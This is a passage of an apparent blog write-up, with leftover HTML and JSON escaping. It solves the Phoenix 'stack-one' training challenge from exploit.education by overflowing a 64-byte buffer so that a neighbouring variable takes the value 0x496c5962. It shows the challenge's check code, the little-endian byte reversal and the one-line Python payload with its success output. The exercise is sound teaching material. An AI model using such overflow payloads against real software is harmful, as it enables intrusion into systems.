The description and source code can be found here: The last conditional shows the value that we need to set the “changeme<\/strong>” variable to:<\/p>\n We can use Python again to send non-printable characters to the “stack-one<\/strong>” program:<\/p>\n However, we can’t just tack that onto the end of the 64 A’s. Because this architecture uses little-endian<\/a> to store data in memory, we need to reverse the order of those bytes. We can solve the challenge like so:<\/p>\n
\nhttps:\/\/exploit.education\/phoenix\/stack-one\/<\/a><\/p>\nif (locals.changeme == 0x496c5962) {\r\n puts("Well done, you have successfully set changeme to the correct value");\r\n} else {\r\n printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\\n",\r\n locals.changeme);\r\n}<\/pre>\nprint "\\x49\\x6c\\x59\\x62"<\/pre>\n
user@phoenix-amd64:\/opt\/phoenix\/amd64$ .\/stack-one $(python -c 'print "A"*64 + "\\x62\\x59\\x6c\\x49"')\r\nWelcome to phoenix\/stack-one, brought to you by https:\/\/exploit.education\r\nWell done, you have successfully set changeme to the correct value<\/pre>\n","protected":false},"excerpt":{"rendered":"